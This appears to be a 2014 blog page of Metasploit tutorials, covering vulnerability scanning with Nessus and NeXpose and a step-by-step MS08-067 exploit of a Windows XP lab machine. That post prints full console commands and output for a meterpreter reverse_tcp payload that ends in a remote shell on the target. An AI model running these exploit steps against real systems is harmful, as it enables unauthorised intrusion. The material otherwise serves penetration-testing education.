Saturday, 29 March 2014

How to exploit window machine!

After discussing how to use msfconsole in my previous tutorial,
now let’s exploit our first machine.

I am  use metasploit from within kali-linux and
virtual Windows XP SP2 machine. now We’ll begin by finding
this vulnerability on our own.

First of all run msfconsole, and use  command :

msf > nmap -sT -A --script=smb-check-vulns -P0 192.168.1.2

Here we use nmap’s script discovery of open ports and get ideas about
how you might exploit a particular service. The
-sT is a Stealth TCP connect, which we have found to be the most
reliable flag when trying to enumerate ports.
The -A specifies advanced OS detection, which does some additional
banner grabs and footprinting of a specific service for us.

We’ll assume that our target is vulnerable to MS08-067 exploit.

Let’s walk through the actual exploitation. First the setup:
msf > search ms08_067_netapi
[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name Rank Description
---- ---- -----------
windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack
Corruption
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
. . . SNIP . . .
26 Windows XP SP2 Japanese (NX)
. . . SNIP . . .
msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > show options
The Joy of Exploitation 67
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.2 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 192.168.1.3 yes The local address
LPORT 8080 yes The local port
Exploit target:
Id Name
-- ----
3 Windows XP SP2 English (NX)

Having set the stage, we’re ready to conduct the actual exploitation:

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.3:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.1.3:8080 -> 192.168.1.2:1487)
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter 192.168.1.3:8080 -> 192.168.1.2:1036
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 4060 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>


Congratulations! You’ve just compromised your first machine!


You can watch video tutorial here...
Posted by at No comments:
Labels: , , ,

Saturday, 22 March 2014

An introduction to Basic Exploitation !

After discussing intelligence gathering phase and vulnerability
scanning in my previous tutorials, now we focus on the basics of
exploitation.Now we exploits operate against the vulnerabilities that
you discover during a penetration test.

Here we are going to show how utilizing the framework for
exploit development allows you to concentrate on what is unique about
the exploit, and makes other matters such as payload, encoding, nop
generation, and so on.

The Metasploit Framework contains hundreds of modules, and it’s nearly
impossible to remember them all. Running show from msfconsole will
display every module available in the Framework,

msf> show exploits

This command will display every currently available exploit within the
Framework.

msf> show options

When you run show options while a module is selected,
Metasploit will display only the options that apply to that particular
module.

Now let's start with example...

Open msfconsole(type msfconsole in terminal). When msfconsole is loaded,
if you want to launch an attack against SQL, type :

msf > search mssql

Or if you  find the MS08-067 exploit specifically,

msf > search ms08_067
Then, having found an exploit , you could load the found module with
the use command :

msf > use windows/smb/ms08_067_netapi

Now we can enter show
options to display the options specific to the MS08-067 exploit:

msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >

As you can see, this exploit required victim's IP address.
You can set RHOST to specific target IP address(192.168.1.1) :

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1

Now when you give command show options again then :

msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.1  The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
As you can see now your target is set.


msf> show payloads :

As with show options, when you run show payloads from a
module-specific prompt, Metasploit displays only the payloads that are
compatible with that module.
To see an active list of payloads, run the following command:
msf> show payloads

if you are in an actual exploit, you will see only payloads applicable
to the attack.
For example, running show payloads from the msf exploit(ms08_067_netapi)
prompt would result in the output shown next.

msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
. . . SNIP . . .
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP
Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP
Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse
Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP
Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse
All-Port TCP Stager
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP
Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP
Inline
Posted by at No comments:
Labels: ,

Wednesday, 12 March 2014

Scanning with Nessus from Within Metasploit !

First of all, destroy the existing database with the db_destroy command
and create a new one using db_connect .

Load the Nessus plug-in by running load nessus, as shown here:


msf > db_destroy postgres:toor@127.0.0.1/msf3
[*] Warning: You will need to enter the password at the prompts below
Password:
msf > db_connect postgres:toor@127.0.0.1/msf3
msf > load nessus
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[+] Exploit Index - (/root/.msf3/nessus_index) - is valid.
[*] Successfully loaded plugin: Nessus



Before starting a scan with the Bridge, you first need to authenticate
to your Nessus server using nessus_connect, as shown here:

msf > nessus_connect Rohit:password@192.168.1.101:8834 ok
[*] Connecting to https://192.168.1.101:8834/ as Rohit
[*] Authenticated

As you need to initiate a scan using a defined policy by its policy ID
number. To list the available scan policies
on the server, use nessus_policy_list:

msf > nessus_policy_list

Take note of the policy ID you want to use for your scan, and then
launch a new scan with nessus_scan_new followed by the policy number,
a name for your scan, and your target IP address as shown next:


msf > nessus_scan_new
[*] Usage:
[*] nessus_scan_new <policy id> <scan name> <targets>

[*] use nessus_policy_list to list all available policies

msf > nessus_scan_new 2 bridge_scan 192.168.1.2


While your scan is in progress, you can see its status by running the
nessus_scan_status command. When this command’s output responds
with “No Scans Running ”, you will know that your scan
has completed.

After the scan has completed, you can list the available scan reports
with the nessus_report_list command:


msf > nessus_report_list
msf > nessus_report_get ID
Posted by at No comments:
Labels: , , , ,

Tuesday, 11 March 2014

Vulnerability Scanning with Nessus !

Nessus is a well known and popular vulnerability scanner that is free
for personal, non-commercial use that was first released in 1998 by
Renaurd Deraison and currently published by Tenable Network Security.

Nessus Configuration :

After you have downloaded and installed Nessus, open your web browser
and navigate to https://<youripaddress>:8834

Creating a Nessus Scan Policy :

Before beginning a scan, you first need to create a Nessus scan policy.
On the Policies tab, click the green Add button to open the policy
configuration window.

Running a Nessus Scan :
After you have created a scan policy, you are ready to configure a scan.
Begin by selecting the Scans tab, and then click the Add button to
open the scan configuration window.


Nessus Reports :
After the scan is complete, it will no longer appear under Scans, and
you should find a new entry under the Reports tab listing the name of
the scan.

Importing Results into the Metasploit Framework :

Now let’s import our results into the Framework.
Click the Download Report button on the Reports tab to save the results
to your hard drive.

Load msfconsole, create a new database with db_connect, and import the
Nessus results file by entering db_import followed by the report
filename.

msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import /tmp/nessus_report_Host_195.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.1.195
For a complete listing of the vulnerability data that was imported into
Metasploit, enter db_vulns without any switches.
Posted by at No comments:
Labels: , , ,

Tuesday, 4 March 2014

How to run NeXpose within MSFconsole !

Running NeXpose from the web GUI is great for fine-tuning vulnerability
scans and generating reports.

But if you prefer to remain in msfconsole, you can still run full
vulnerability scans with the NeXpose plug-in included in Metasploit.

First of all, delete any existing database with db_destroy, create a
new database in Metasploit with db_connect, and then load the NeXpose
plug-in with load nexpose :




msf > db_destroy postgres:toor@127.0.0.1/msf3
[*] Warning: You will need to enter the password at the prompts below
Password:
msf > db_connect postgres:toor@127.0.0.1/msf3
msf > load nexpose
[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose



Before running your first scan from msfconsole, you will need to
connect to your NeXpose installation. Enter nexpose_connect -h to
display the usage required to connect; add your username, password, and
host address; and accept the SSL certificate warning by adding ok to
the end of the connect string:



msf > nexpose_connect -h
[*] Usage:
[*] nexpose_connect username:password@host[:port] <ssl-confirm>
[*] -OR-
[*] nexpose_connect username password host port <ssl-confirm>
msf > nexpose_connect user:password@192.168.1.2 ok
[*] Connecting to NeXpose instance at 192.168.1.2:3780 with username user...




Now enter nexpose_scan followed by the target IP address to initiate a
scan:



msf > nexpose_scan 192.168.1.2
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
msf >


After the NeXpose scan completes, the database you created earlier
should contain the results of the vulnerability scan. To view the
results, enter db_hosts,

msf > db_hosts -c address
Hosts
=====
address         Svcs    Vulns   Workspace
-------         ----   -----    ---------
192.168.1.2        5     8     default
msf >
As you can see, NeXpose has discovered seven vulnerabilities.
Run db_vulns to display the vulnerabilities found:

msf > db_vulns
Posted by at No comments:
Labels: , , ,

Saturday, 1 March 2014

Vulnerability Scanning with NeXpose !

 NeXpose is Rapid7’s vulnerability scanner that scans networks to
identify the devices running on them and performs checks to identify
security weaknesses in operating systems and applications.

We will first perform a basic overt scan of our
target and import the vulnerability scan results into Metasploit. We
will close out this section by showing you how to run a NeXpose
vulnerability scan directly from msfconsole rather than using the
web-based GUI.

Configuration:

After installing NeXpose Community, open a web browser and navigate to

https://<youripaddress>:3780

On the NeXpose main page, you will notice a number of tabs at the top
of the interface like Assets tab,Reports tab,Vulnerabilities tab,
Administration tab.

The New Site Wizard :
Prior to running a vulnerability scan with NeXpose, you need to
configure a site. This sites will then be scanned by
NeXpose, and different scan types can be defined for a particular site.

To create a site, click the New Site button on the NeXpose home page,
enter a name for your site and a brief description, and then
click Next.

In the devices step, you have quite a bit of granularity
in defining your targets. You can add a single IP address, address
ranges, hostnames, and more. Click Next when you have finished adding
and excluding devices.

At the scan setup step, you can choose from several different scan templates,
such as Discovery Scan and Penetration test; select the scanning
engine you want to use. click Next to continue.

Add credentials for the site you want to scan, if you have them.
On the Credentials tab, click the New Login button, type a username
and password for the IP address you want to scan, and then click Test
Login to verify your credentials then save them.

The New Report Wizard :

Click New Report, Enter a friendly name, and then in the Report format
field, select NeXpose Simple XML Export so that you will be able to
import the scan results into Metasploit.

Click Next when you are ready to proceed.
In the subsequent window, add the devices you want to be included in
the report by clicking Select Sites to add your scanned target range,
Then click Save.
In the Select Devices dialog, select the targets to include in your
report and then click Save.
Back in the Report Configuration wizard, click Save to accept the
remaining defaults for the report.

Importing Your Report into the Metasploit Framework:

Having completed a full vulnerability scan with NeXpose, you need to
import the results into Metasploit. But before you do, you must create
a new database from msfconsole by issuing db_connect. After creating
that database you’ll import the NeXpose XML using the db_import command.

--------------------
msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import /tmp/report.xml
[*] Importing 'NeXpose Simple XML' data
[*] Importing host 192.168.1.195
[*] Successfully imported /tmp/report.xml
msf > db_hosts -c address,svcs,vulns
---------------------------



Posted by at No comments:
Labels: , , ,
Subscribe to: Posts (Atom)